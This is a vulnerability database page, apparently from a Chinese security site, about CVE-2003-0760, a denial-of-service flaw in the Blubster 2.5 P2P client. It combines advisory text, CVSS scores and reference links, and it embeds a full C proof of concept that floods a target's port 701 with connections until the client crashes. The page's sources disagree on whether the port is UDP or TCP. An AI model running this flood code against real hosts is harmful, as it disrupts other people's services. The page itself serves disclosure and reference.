CVE-2003-0760
CVSS5.0
发布时间 :2003-09-17 00:00:00
修订时间 :2008-09-05 16:35:10
NMCOES    

[原文]Blubster 2.5 allows remote attackers to cause a denial of service (crash) via a flood of connections to UDP port 701.


[CNNVD]OptiSoft Blubster远程拒绝服务攻击漏洞(CNNVD-200309-003)

        
        OptiSoft Blubster是一款P2P客户程序。
        OptiSoft Blubster对用户提交的语音聊天会话请求缺少完善的处理,远程攻击者可以利用这个漏洞对目标客户端进行拒绝服务攻击。
        攻击者可以对701 TCP端口,进行大量的语音聊天会话请求,可导致软件崩溃。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0760
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0760
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200309-003
(官方数据源) CNNVD

- 其它链接及资源

http://www.securiteam.com/windowsntfocus/5RP0N15AUC.html
(PATCH)  MISC  http://www.securiteam.com/windowsntfocus/5RP0N15AUC.html
http://xforce.iss.net/xforce/xfdb/13012
(VENDOR_ADVISORY)  XF  blubster-port701-dos(13012)
http://www.securityfocus.com/bid/8482
(VENDOR_ADVISORY)  BID  8482

- 漏洞信息

OptiSoft Blubster远程拒绝服务攻击漏洞
中危 其他
2003-09-17 00:00:00 2005-10-20 00:00:00
远程  
        
        OptiSoft Blubster是一款P2P客户程序。
        OptiSoft Blubster对用户提交的语音聊天会话请求缺少完善的处理,远程攻击者可以利用这个漏洞对目标客户端进行拒绝服务攻击。
        攻击者可以对701 TCP端口,进行大量的语音聊天会话请求,可导致软件崩溃。
        

- 公告与补丁

        厂商补丁:
        OptiSoft
        --------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.blubster.com/

- 漏洞信息 (23056)

OptiSoft Blubster 2.5 Remote Denial of Service Attack (EDBID:23056)
windows dos
2003-08-25 Verified
0 Luca Ercoli
N/A [点击下载]
source: http://www.securityfocus.com/bid/8482/info

t has been reported that Blubster is prone to a remote denial of service vulnerability due to a port flooding attack on TCP port 701. The problem is reported to present itself when a remote attacker floods port 701 with voice chat session requests. This issue may cause the software to crash resulting in a denial of service to legitimate users.

This attack may not be logged, therefore allowing an attack to exploit this issue persistently. 

/******************************************************************
* Blubster client v2.5 Remote Denial of Service *
* Proof of Concept by Luca Ercoli luca.ercoli[at]inwind.it *
******************************************************************/
 
#include <stdio.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
 

int ck,port=701,sd,cx=0,contatore=0,prec;
 
struct sockaddr_in blubster_client;
 
 
 
void ending(char *client){
 
int i;
 

blubster_client.sin_family = AF_INET;
blubster_client.sin_port = htons((u_short)port);
blubster_client.sin_addr.s_addr = (long)inet_addr(client);
 

for(i = 0; i < 100; i++){
 
sd = socket(AF_INET, SOCK_STREAM, 0);
ck = connect(sd, (struct sockaddr *) &blubster_client, sizeof(blubster_client)); 
 

if(ck != 0) { 
 
prec = 0;
 
if (prec == 0) contatore++;
if (prec == 1) contatore = 0;
 
if (contatore > 13) {
printf("! Remote client seems to be crashed.\n");
exit(0);
}
 
}
 
if(ck == 0) prec = 1;
 
  close(sd);
}
 
}
 
 
 

void kill_blubster(char *stringa){
 
short i;
 
  blubster_client.sin_family = AF_INET;
  blubster_client.sin_port = htons((u_short)port);
  blubster_client.sin_addr.s_addr = (long)inet_addr(stringa);
   
 
for(i = 0; i < 50; i++){
 
  
sd = socket(AF_INET, SOCK_STREAM, 0);
ck = connect(sd, (struct sockaddr *) &blubster_client, sizeof(blubster_client)); 
 

if(ck != 0) exit(0);
 
close(sd);
 
}
 
}
 
 
 

int main(int argc, char **argv)
{
 
short i;
 
 prec = 0;
 
  if(argc < 2)
  { 
    printf("\nUsage: %s <client-ip>\n", argv[0]);
    exit(0);
  }
  
 
prec=0;
 
printf ("\n\n+ DoS Started...\n");
printf("+ Flooding remote client...\n");
 

for (i=0; i<12; i++) if(!fork()) kill_blubster(argv[1]);
 
printf ("+ Ending...\n");
 
ending(argv[1]);
  
}

		

- 漏洞信息

6416
Blubster UDP Port 701 Flood DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Blubster contains a flaw that may allow a remote denial of service. The issue is triggered when a packet flood is directed to UDP port 701, and will result in loss of availability for the service.

- 时间线

2003-08-24 2003-08-24
2003-08-24 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

OptiSoft Blubster Remote Denial of Service Attack
Failure to Handle Exceptional Conditions 8482
Yes No
2003-08-25 12:00:00 2009-07-11 11:56:00
The disclosure of this issue has been credited to Luca Ercoli.

- 受影响的程序版本

OptiSoft Blubster 2.5

- 漏洞讨论

It has been reported that Blubster is prone to a remote denial of service vulnerability due to a port flooding attack on TCP port 701. The problem is reported to present itself when a remote attacker floods port 701 with voice chat session requests. This issue may cause the software to crash resulting in a denial of service to legitimate users.

This attack may not be logged, therefore allowing an attack to exploit this issue persistently.

- 漏洞利用

The following exploit code has been provided:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站